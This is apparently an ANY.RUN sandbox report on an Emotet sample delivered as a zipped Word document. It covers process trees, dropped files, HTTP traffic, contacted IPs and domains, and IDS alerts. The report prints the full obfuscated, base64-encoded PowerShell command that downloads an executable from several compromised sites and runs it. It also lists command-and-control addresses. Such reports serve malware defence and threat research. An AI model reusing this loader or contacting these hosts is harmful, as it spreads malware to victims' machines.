File name: | 4818577723260928.zip |
Full analysis: | https://app.any.run/tasks/348b1035-7783-46fb-8e8a-fb6e0bf0d88f |
Verdict: | Malicious activity |
Threats: | Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime, it was upgraded to become a very destructive malware. It targets mostly corporate victims but even private users get infected in mass spam email campaigns. |
Analysis date: | October 20, 2020, 07:51:56 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Tags: | |
Indicators: | |
MIME: | application/zip |
File info: | Zip archive data, at least v2.0 to extract |
MD5: | E4D4C6D4C01887BFB25E0C0122CB0431 |
SHA1: | 1E4C747280E5271C4CC5D71007316984140BC287 |
SHA256: | 7BCE923B9A92A13EC32E3707F87B84EACB11A4C39927895D25D62B5831566DF6 |
SSDEEP: | 1536:pUWxf3Y5y6j2zpUpogyXdmznEsPS3ai+vxon6a40g1Em7kqjxsjRIlNRG7BFn:pjxf3ky6jA/8EsSJ+vx06aYEmMjyWBFn |
.zip | | | ZIP compressed archive (100) |
---|
ZipFileName: | 2534bd1e3dd2ba890e903ecabb7906799e2111c09dabd87103d76820125fa324 |
---|---|
ZipUncompressedSize: | 159159 |
ZipCompressedSize: | 81444 |
ZipCRC: | 0xf02aad28 |
ZipModifyDate: | 1980:00:00 00:00:00 |
ZipCompression: | Deflated |
ZipBitFlag: | 0x0009 |
ZipRequiredVersion: | 20 |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
2988 | "C:\Program Files\WinRAR\WinRAR.exe" "C:\Users\admin\Downloads\4818577723260928.zip" | C:\Program Files\WinRAR\WinRAR.exe | — | explorer.exe |
User: admin Company: Alexander Roshal Integrity Level: MEDIUM Description: WinRAR archiver Version: 5.60.0 | ||||
972 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\Desktop\asd.doc" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | — | explorer.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Word Version: 14.0.6024.1000 | ||||
3484 | POwersheLL -ENCOD IAAgAHMAZQB0AC0ASQBUAEUATQAgAHYAYQByAGkAQQBCAEwAZQA6AGsAegBlAFEAbABVACAAIAAoAFsAdABZAFAAZQBdACgAJwBzAFkAJwArACcAcwBUAEUAbQAnACsAJwAuAGkAJwArACcAbwAuAGQASQByAEUAQwB0AE8AUgAnACsAJwBZACcAKQAgACAAKQAgACAAOwAgACAAcwBlAHQALQB2AGEAUgBJAGEAQgBMAGUAIAAgACgAJwByAEYARwAyADUAJwArACcANAAnACkAIAAgACgAIAAgAFsAVAB5AFAAZQBdACgAJwBTAFkAJwArACcAcwBUAEUAJwArACcAbQAnACsAJwAuAG4AJwArACcAZQBUAC4AcwBFAFIAJwArACcAVgBpAEMARQBwAG8AaQBOAFQAJwArACcAbQAnACsAJwBBAE4AYQBnAEUAJwArACcAcgAnACkAIAApADsAIAAgACAAUwBlAFQALQBpAHQAZQBNACAAKAAiAHYAQQAiACsAIgByAGkAQQAiACsAIgBCAGwAZQA6ADQARwBNAHMAIgApACAAKABbAHQAWQBQAGUAXQAoACcAUwBZAFMAVAAnACsAJwBlAE0AJwArACcALgBuAEUAdAAnACsAJwAuAFMAJwArACcARQAnACsAJwBDACcAKwAnAFUAJwArACcAcgBpAHQAWQBQAFIAbwBUAG8AJwArACcAYwBvAGwAVAB5AFAARQAnACkAIAApACAAIAA7ACAAJABXAHUAYQBtADcAagBlAD0AKAAnAFcANwA5AGgAJwArACcAcAAnACsAJwA3AHQAJwApADsAJABJADIAaABmADAAYwB3AD0AJABJADIAMwBkADYAZwB5ACAAKwAgAFsAYwBoAGEAcgBdACgAOAAwACAALQAgADMAOAApACAAKwAgACQATABiAHoAeQBmADcAagA7ACQAWgBfAGwAbwBjAGsAawA9ACgAJwBVACcAKwAnAGIAegBoAGQAZwBsACcAKQA7ACAAIAAkAGsAWgBFAFEAbABVADoAOgBDAFIARQBBAHQARQBkAGkAcgBlAEMAVABPAHIAeQAoACQAZQBuAHYAOgB1AHMAZQByAHAAcgBvAGYAaQBsAGUAIAArACAAKAAoACcATwAnACsAJwBUAGYAVwA5ACcAKwAnAGwAdQAnACsAJwBkAGEAbgBPAFQAZgAnACsAJwBBAHYAJwArACcAZwBxAGsAagAzAE8AJwArACcAVABmACcAKQAgACAALQBjAHIARQBwAEwAYQBjAGUAIAAgACgAWwBDAGgAQQByAF0ANwA5ACsAWwBDAGgAQQByAF0AOAA0ACsAWwBDAGgAQQByAF0AMQAwADIAKQAsAFsAQwBoAEEAcgBdADkAMgApACkAOwAkAEIANwBkAHQAcwB5AG4APQAoACcAWAB6ADcAJwArACcANQB2AHIAZQAnACkAOwAgACAAKABnAGkAIAAgACgAIgB2ACIAKwAiAGEAUgBJAEEAQgBsAGUAOgBSACIAKwAiAGYARwAyADUANAAiACkAIAApAC4AVgBBAEwAdQBFADoAOgBTAGUAYwB1AFIAaQBUAFkAcABSAG8AVABPAEMATwBsACAAPQAgACAAIAAkADQAZwBNAHMAOgA6AHQATABTADEAMgA7ACQAUQA2AGkAcAB1AGUAaQA9ACgAJwBMACcAKwAnAGYAbAA0ACcAKwAnAHIAcQBoACcAKQA7ACQASQA1ADMAegBpAG0AbQAgAD0AIAAoACcAUwB0ACcAKwAnAHcAawAnACsAJwAzADEAdgAnACkAOwAkAFEAeABzAG4AcAByAGEAPQAoACcAWAAxAHYAagA5ADgAJwArACcAdgAnACkAOwAkAFIAYwBjAG0AbgB2AGcAPQAoACcATQB2AGQAJwArACcAYwA3ADYAaAAnACkAOwAkAEoAMAA5AHgAYQBmADIAPQAkAGUAbgB2ADoAdQBzAGUAcgBwAHIAbwBmAGkAbABlACsAKAAoACcAewAwAH0AJwArACcAVwA5AGwAdQBkAGEAbgAnACsAJwB7ADAAfQBBAHYAZwAnACsAJwBxAGsAagAzACcAKwAnAHsAMAAnACsAJwB9ACcAKQAgACAALQBGACAAWwBDAEgAQQBSAF0AOQAyACkAKwAkAEkANQAzAHoAaQBtAG0AKwAoACcALgBlACcAKwAnAHgAZQAnACkAOwAkAEcAOQA0ADgAdwA2AHgAPQAoACcARABfACcAKwAnADgAMwAnACsAJwA2ADAAbQAnACkAOwAkAEkAYgBjAHUAbwBpADgAPQBuAGUAVwAtAG8AYABCAEoAYABFAEMAVAAgAE4AZQBUAC4AdwBlAGIAQwBsAEkAZQBOAFQAOwAkAEoAdgBtAG0AZgB5ADAAPQAoACcAaAB0ACcAKwAnAHQAcAA6ACcAKwAnAC8ALwAnACsAJwB0AHUAZAAnACsAJwBvAHIAJwArACcAaQBuACcAKwAnAHYAZQAnACsAJwBzAHQAJwArACcALgBjACcAKwAnAG8AJwArACcAbQAvAHcAcAAtAGEAZAAnACsAJwBtAGkAJwArACcAbgAvAHIARwAnACsAJwB0AG4AVQBiADUAZgAnACsAJwAvACcAKwAnACoAaAB0AHQAcAAnACsAJwA6ACcAKwAnAC8ALwBkAHAALQB3AG8AJwArACcAbQBlACcAKwAnAG4AYgBhACcAKwAnAHMAJwArACcAawBlACcAKwAnAHQALgBjACcAKwAnAG8AbQAnACsAJwAvAHcAcAAtACcAKwAnAGEAJwArACcAZABtACcAKwAnAGkAbgAvACcAKwAnAEwAaQAvACcAKwAnACoAJwArACcAaAAnACsAJwB0AHQAcAA6AC8ALwBzACcAKwAnAHQAeQBsAGUAZgBpAHgALgBjACcAKwAnAG8ALwAnACsAJwBnAHUAaQBsAGwAbwAnACsAJwB0ACcAKwAnAGkAJwArACcAbgBlAC0AYwAnACsAJwByAG8AJwArACcAcwAnACsAJwBzACcAKwAnAC8AJwArACcAQwAnACsAJwBUAFIATgBPAFEALwAqAGgAdAB0AHAAOgAvAC8AYQByAGQAJwArACcAbwBzAC4AYwBvACcAKwAnAG0ALgBiAHIALwBzAGkAbQAnACsAJwB1AGwAYQBkAG8AcgAvAGIAUABOACcAKwAnAHgALwAnACsAJwAqAGgAdAAnACsAJwB0AHAAJwArACcAOgAnACsAJwAvAC8AZAByAHQAaABlAHUAJwArACcAcgBlAGwAcAAnACsAJwBsAGEAcwB0AGkAYwBzAHUAJwArACcAcgBnAGUAJwArACcAcgB5AC4AJwArACcAYwBvAG0ALwAnACsAJwBnACcAKwAnAGUAbgAnACsAJwBlAHIAYQBsAG8ALwByAGgAJwArACcAcgBoAGYAbAAnACsAJwB2ADkAJwArACcAMgAvACoAJwArACcAaAB0AHQAcAA6AC8ALwBiAG8AZAB5AGkAbgBuACcAKwAnAG8AdgBhAHQAJwArACcAaQBvAG4AJwArACcALgBjAG8ALgB6ACcAKwAnAGEALwAnACsAJwB3AHAAJwArACcALQBjACcAKwAnAG8AbgB0AGUAbgB0AC8AMgBzAHMAJwArACcASAB2ACcAKwAnAGkALwAqAGgAdAB0AHAAOgAvAC8AJwArACcAbgBvAG0AYQBkAGMAbwAuACcAKwAnAGUAcwAnACsAJwAvAHcAcAAtACcAKwAnAGEAZAAnACsAJwBtAGkAbgAvAE0AdgB3AFYASABDAEcALwAnACkALgBTAFAATABJAFQAKAAkAFkAeQB4ADEAeQBqADkAIAArACAAJABJADIAaABmADAAYwB3ACAAKwAgACQATABjADcANQBuADAAcQApADsAJABOAHoAYQBhAGQAegBsAD0AKAAnAEwAZABoAG4AeQBwACcAKwAnAHYAJwApADsAZgBvAHIAZQBhAGMAaAAgACgAJABQAGcAcABqADkAdwBhACAAaQBuACAAJABKAHYAbQBtAGYAeQAwACkAewB0AHIAeQB7ACQASQBiAGMAdQBvAGkAOAAuAGQAbwB3AG4ATABPAEEAZABGAGkATABlACgAJABQAGcAcABqADkAdwBhACwAIAAkAEoAMAA5AHgAYQBmADIAKQA7ACQARwBrAGUAaABpAHIAaQA9ACgAJwBaADIAJwArACcAcgB1ADAAJwArACcANAB4ACcAKQA7AEkAZgAgACgAKABnAEUAYABUAC0AYABJAFQAZQBNACAAJABKADAAOQB4AGEAZgAyACkALgBsAEUAbgBnAFQAaAAgAC0AZwBlACAAMgA2ADMANAA2ACkAIAB7ACgAWwB3AG0AaQBjAGwAYQBzAHMAXQAoACcAdwBpAG4AMwAnACsAJwAyAF8AUAByAG8AYwAnACsAJwBlAHMAcwAnACkAKQAuAEMAcgBlAEEAdABlACgAJABKADAAOQB4AGEAZgAyACkAOwAkAFYAagBnADkAbQAxAGoAPQAoACcAVgBrAHYAYgAnACsAJwB2AG4AJwArACcAYgAnACkAOwBiAHIAZQBhAGsAOwAkAEkAdgBjADYAagA2AGIAPQAoACcAWgAnACsAJwBiAG4AaAAyACcAKwAnADYAdwAnACkAfQB9AGMAYQB0AGMAaAB7AH0AfQAkAEEANQA2AGcAcAB3ADgAPQAoACcAVwAnACsAJwA1ACcAKwAnAG8AZwB5ADAAcAAnACkA | C:\Windows\System32\WindowsPowerShell\v1.0\POwersheLL.exe | wmiprvse.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
3516 | C:\Users\admin\W9ludan\Avgqkj3\Stwk31v.exe | C:\Users\admin\W9ludan\Avgqkj3\Stwk31v.exe | wmiprvse.exe | |
User: admin Integrity Level: MEDIUM Description: AdvancedTaskManager MFC Application Exit code: 0 Version: 1, 0, 0, 1 | ||||
3316 | "C:\Users\admin\AppData\Local\cngprovider\KBDA3.exe" | C:\Users\admin\AppData\Local\cngprovider\KBDA3.exe | Stwk31v.exe | |
User: admin Integrity Level: MEDIUM Description: AdvancedTaskManager MFC Application Version: 1, 0, 0, 1 |
PID | Process | Filename | Type | |
---|---|---|---|---|
2988 | WinRAR.exe | C:\Users\admin\AppData\Local\Temp\Rar$DRb2988.16933\2534bd1e3dd2ba890e903ecabb7906799e2111c09dabd87103d76820125fa324 | — | |
MD5:— | SHA256:— | |||
972 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVR8C76.tmp.cvr | — | |
MD5:— | SHA256:— | |||
3484 | POwersheLL.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\N5D6L7MWSVTWYWZQGMDZ.temp | — | |
MD5:— | SHA256:— | |||
3484 | POwersheLL.exe | C:\Users\admin\W9ludan\Avgqkj3\Stwk31v.exe | — | |
MD5:— | SHA256:— | |||
972 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotm | pgc | |
MD5:1078FA135590E0A41C5C035ABA4229C8 | SHA256:A92822596E293E94AC577D7DC94DE6D9EE22D93766D33DD175A48F048FF11A5F | |||
972 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Office\Recent\asd.doc.LNK | lnk | |
MD5:FBAD28DA9788142EEA61B6A12D00CD7A | SHA256:FFEEB27A14388B6287315EF184C51A6C3098BB0E0BAF73E208C7A567AA5628C3 | |||
3484 | POwersheLL.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms | binary | |
MD5:B8D28A0751A092388652CF6B1F64DABE | SHA256:BFC8F6304F913269DA5A5B86F1EA87E55AB280927CDDDF355A74454F563FAD89 | |||
972 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\VBE\MSForms.exd | tlb | |
MD5:09FEEE6D106BD2F96BD038E262AF6433 | SHA256:01F242D5A02D09AF5DC8CEB664A09572519C54A4FCE915FC61EE14456E12F1FF | |||
3484 | POwersheLL.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF169ba8.TMP | binary | |
MD5:B8D28A0751A092388652CF6B1F64DABE | SHA256:BFC8F6304F913269DA5A5B86F1EA87E55AB280927CDDDF355A74454F563FAD89 | |||
972 | WINWORD.EXE | C:\Users\admin\Desktop\~$asd.doc | pgc | |
MD5:C38C624DE5A6C8F94F2A7BD21EB7B5E3 | SHA256:62781C8A0AC69C0C6AE6FED0D4138E2E0008DAEA4AA15AC56A1CBA589855E809 |
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
3484 | POwersheLL.exe | GET | 200 | 104.24.121.136:80 | http://tudorinvest.com/wp-admin/rGtnUb5f/ | US | html | 4.19 Kb | malicious |
3316 | KBDA3.exe | POST | — | 177.130.51.198:80 | http://177.130.51.198/NBN0gP3YioVI5Yq/AMMy1Ivqc5t/ | BR | — | — | malicious |
3484 | POwersheLL.exe | GET | 301 | 162.214.79.126:80 | http://ardos.com.br/simulador/bPNx/ | US | html | 248 b | suspicious |
3484 | POwersheLL.exe | GET | 200 | 104.28.13.193:80 | http://dp-womenbasket.com/wp-admin/Li/ | US | html | 4.19 Kb | suspicious |
3484 | POwersheLL.exe | GET | 404 | 34.70.135.127:80 | http://stylefix.co/guillotine-cross/CTRNOQ/ | US | html | 10.8 Kb | malicious |
3484 | POwersheLL.exe | GET | 200 | 197.242.150.195:80 | http://bodyinnovation.co.za/wp-content/2ssHvi/ | ZA | executable | 714 Kb | suspicious |
3316 | KBDA3.exe | POST | — | 91.121.87.90:8080 | http://91.121.87.90:8080/hWX0iwtMEVz1E4dFqd/c5Qff8D0ZloWVtYS4/QtMdTgGvtkNMc/dvrpxZ0lFCLeQr/RZjo5MqcM/ | FR | — | — | malicious |
3316 | KBDA3.exe | POST | — | 104.131.144.215:8080 | http://104.131.144.215:8080/xB0b/Mai40Ng7X50Tod/c2VtLagCyZ/mQ39PigMbiCKmX/6meEY/ | US | — | — | malicious |
3316 | KBDA3.exe | POST | 200 | 188.226.165.170:8080 | http://188.226.165.170:8080/cZbCy4vfbLqyINj/EZYNu92KAjExjpaT/Sc9KlddkjNU/yKc0EMao/ | NL | binary | 132 b | malicious |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
3484 | POwersheLL.exe | 34.70.135.127:80 | stylefix.co | — | US | unknown |
3484 | POwersheLL.exe | 104.28.13.193:80 | dp-womenbasket.com | Cloudflare Inc | US | suspicious |
3484 | POwersheLL.exe | 104.24.121.136:80 | tudorinvest.com | Cloudflare Inc | US | suspicious |
3484 | POwersheLL.exe | 162.214.79.126:80 | ardos.com.br | Unified Layer | US | suspicious |
3484 | POwersheLL.exe | 197.242.150.195:80 | bodyinnovation.co.za | Afrihost | ZA | suspicious |
3316 | KBDA3.exe | 177.130.51.198:80 | — | Wsp Serviços de Telecomunicações Ltda | BR | malicious |
3484 | POwersheLL.exe | 162.214.79.126:443 | ardos.com.br | Unified Layer | US | suspicious |
3316 | KBDA3.exe | 91.121.87.90:8080 | — | OVH SAS | FR | malicious |
3316 | KBDA3.exe | 104.131.144.215:8080 | — | Digital Ocean, Inc. | US | malicious |
3316 | KBDA3.exe | 188.226.165.170:8080 | — | Digital Ocean, Inc. | NL | malicious |
Domain | IP | Reputation |
---|---|---|
tudorinvest.com |
| malicious |
dp-womenbasket.com |
| suspicious |
stylefix.co |
| malicious |
ardos.com.br |
| suspicious |
www.ardos.com.br |
| suspicious |
drtheurelplasticsurgery.com |
| suspicious |
bodyinnovation.co.za |
| suspicious |
PID | Process | Class | Message |
---|---|---|---|
3484 | POwersheLL.exe | A Network Trojan was detected | ET POLICY Terse Named Filename EXE Download - Possibly Hostile |
3484 | POwersheLL.exe | Potential Corporate Privacy Violation | ET POLICY PE EXE or DLL Windows file download HTTP |
3484 | POwersheLL.exe | Potentially Bad Traffic | ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download |
3484 | POwersheLL.exe | Misc activity | ET INFO EXE - Served Attached HTTP |
3316 | KBDA3.exe | A Network Trojan was detected | MALWARE [PTsecurity] Emotet |
3484 | POwersheLL.exe | A Network Trojan was detected | AV POLICY CloudFlare Anti-Phishing Protection Warning in HTML Inbound |
3484 | POwersheLL.exe | A Network Trojan was detected | AV POLICY CloudFlare Anti-Phishing Protection Warning in HTML Inbound |
3484 | POwersheLL.exe | A Network Trojan was detected | ET POLICY Terse Named Filename EXE Download - Possibly Hostile |
3316 | KBDA3.exe | A Network Trojan was detected | MALWARE [PTsecurity] Emotet |
3316 | KBDA3.exe | A Network Trojan was detected | MALWARE [PTsecurity] Emotet |